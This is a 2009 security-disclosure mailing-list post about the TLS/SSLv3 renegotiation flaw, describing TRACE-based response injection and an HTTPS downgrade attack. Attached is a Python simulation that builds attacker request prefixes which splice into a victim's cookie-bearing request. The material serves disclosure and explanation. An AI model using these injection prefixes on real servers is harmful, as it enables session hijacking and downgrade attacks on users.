Date: Mon, 30 Nov 2009 15:15:42 +0100
From: Thierry Zoller <>
To: bugtraq <>,
	full-disclosure <>,
	<>, <>, <>,
Subject: TLS / SSLv3 vulnerability explained  (New ways to leverage the vulnerability)

Dear List,

I updated the whitepaper with a lot of new information, some of it
leveraging the vulnerability in other ways that certainly increase
the effectiveness and impact of this vulnerability.

A brief warning to those who think they are safe because they
don't accept client-side renegotiations (server + OpenSSL): I
came across major websites where the SSL load balancer in front of the HTTPS
servers was vulnerable. Although the servers were patched, it was still
possible to perform the attacks (the load balancer merged both
sessions and handed them to the web server as one).

Updates:
- Added a simple s_client test case
- Analysis of FTPS (vendors are encouraged to assess)
- HTTPS: Injecting arbitrary _responses_ into the stream
- HTTPS: Downgrading HTTPS to HTTP and performing an active MITM
          (Discovered by Frank Heidt but details withheld,
          rediscovered by Thierry Zoller for this paper)

With this new information, G-SEC encourages vendors and customers
to reevaluate the impact of this vulnerability on their products.

Brief explanations:
HTTPS: Injecting arbitrary _responses_ into the stream
The attacker injects a TRACE command; by doing so the attacker can
indirectly control the content that is sent from the server to the
victim over HTTPS.

Downgrading HTTPS to HTTP and performing an active MITM
This attack leverages the known SSLStrip attack to also work on
established SSL connections. SSLStrip had the limitation that it
required a user to access the site over HTTP in order to rewrite the HTML
code and perform the active MITM. This attack, over the TLS renegotiation
vulnerability, now allows (if certain conditions are met) downgrading
EXISTING SSL connections to perform an SSLStrip attack.

Proof of concept files
G-SEC provides 2 proof of concept files:
- ssl-trace.c : using TRACE to inject (partially) arbitrary content
                into the encrypted stream
- ssl-302.c : injecting a GET command for a 302 page redirecting the
              client to HTTP

Whitepaper:
POC files:


This paper explains the vulnerability for a broader audience and
summarizes the information that is currently available. The document
is prone to updates and is believed to be accurate by the time of


Direct Download

Information is believed to be accurate by the time of writing.
As this vulnerability has complex implications this document
is prone to revisions in the future.

Thierry ZOLLER - G-SEC
Principal Security Consultant
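The mechanics shared by both proof-of-concept scenarios in the post (ssl-302 and ssl-trace), as an added example that is not part of the original mail or of G-SEC's PoC files: the attacker's plaintext sent before the renegotiation is spliced by the TLS endpoint (server, or an SSL load balancer that merges both sessions) in front of the victim's request, so the attacker's request line wins and the victim's request line is swallowed into an unterminated header. The hostname, paths, header names and cookie below are constructed for illustration; the TRACE handler is a model of a server that echoes the request, not any specific product.

```python
# Added example: simulate the plaintext merge behind the 2009 TLS
# renegotiation attack as described in the post. All hostnames, paths,
# header names and the cookie value are constructed for illustration.

CRLF = b"\r\n"

# Constructed victim request: what the browser sends in the renegotiated
# session. It carries the session cookie the attacker never sees in clear.
VICTIM_REQUEST = (
    b"GET /account HTTP/1.1" + CRLF
    + b"Host: bank.example" + CRLF
    + b"Cookie: session=abc123" + CRLF
    + CRLF
)

# Constructed attacker prefix for the ssl-302 scenario: a complete request
# line for a page that answers with a 302 to http://, plus an unterminated
# header. Because the prefix ends without CRLF, the victim's own request
# line becomes the *value* of X-Ignore and is discarded by the server.
ATTACKER_302_PREFIX = (
    b"GET /redirect-to-http HTTP/1.1" + CRLF
    + b"Host: bank.example" + CRLF
    + b"X-Ignore: "
)

# Constructed attacker prefix for the ssl-trace scenario: TRACE makes the
# server echo the request, so any header the attacker puts here, and the
# victim's cookie that follows it, end up in the HTTPS response body.
ATTACKER_TRACE_PREFIX = (
    b"TRACE / HTTP/1.1" + CRLF
    + b"Host: bank.example" + CRLF
    + b"X-Injected: attacker-controlled text" + CRLF
    + b"X-Ignore: "
)


def merge_streams(attacker_prefix: bytes, victim_request: bytes) -> bytes:
    """Bytes the application layer sees when the TLS endpoint (server or
    SSL load balancer) splices pre- and post-renegotiation plaintext
    into one stream."""
    return attacker_prefix + victim_request


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, then headers up to
    the first empty line. Duplicate headers are kept as a list."""
    head, _sep, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    method, target, version = lines[0].decode("latin-1").split(" ", 2)
    headers: dict = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(b":")
        key = name.decode("latin-1").strip().lower()
        headers.setdefault(key, []).append(value.decode("latin-1").strip())
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def trace_response(request: dict) -> bytes:
    """Model of a server with TRACE enabled: it echoes the request head as
    a message/http body, which is what makes the injected header and the
    victim's cookie visible in the response the victim receives over HTTPS."""
    echoed = [f"{request['method']} {request['target']} {request['version']}"]
    for name, values in request["headers"].items():
        for value in values:
            echoed.append(f"{name}: {value}")
    body = CRLF.join(line.encode("latin-1") for line in echoed) + CRLF
    return (b"HTTP/1.1 200 OK" + CRLF
            + b"Content-Type: message/http" + CRLF
            + b"Content-Length: " + str(len(body)).encode("ascii") + CRLF
            + CRLF + body)


def server_view(attacker_prefix: bytes) -> dict:
    """What the server parses after the attacker prefix is merged with the
    constructed victim request."""
    return parse_request(merge_streams(attacker_prefix, VICTIM_REQUEST))


if __name__ == "__main__":
    view = server_view(ATTACKER_302_PREFIX)
    print(view["method"], view["target"])        # GET /redirect-to-http
    print(view["headers"]["x-ignore"])           # ['GET /account HTTP/1.1']
    print(view["headers"]["cookie"])             # ['session=abc123']
    print(trace_response(server_view(ATTACKER_TRACE_PREFIX)).decode("latin-1"))
```

In the ssl-302 case the server serves the attacker's chosen resource, authenticated with the victim's cookie, and the 302 it returns travels down the victim's own HTTPS connection; in the ssl-trace case the echo carries attacker-controlled header text into a response the victim's browser trusts as coming from the site. Note that the prefix never needs to decrypt anything: the splice happens in plaintext on the server side, which is why a load balancer that merges the two sessions defeats a patched backend.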
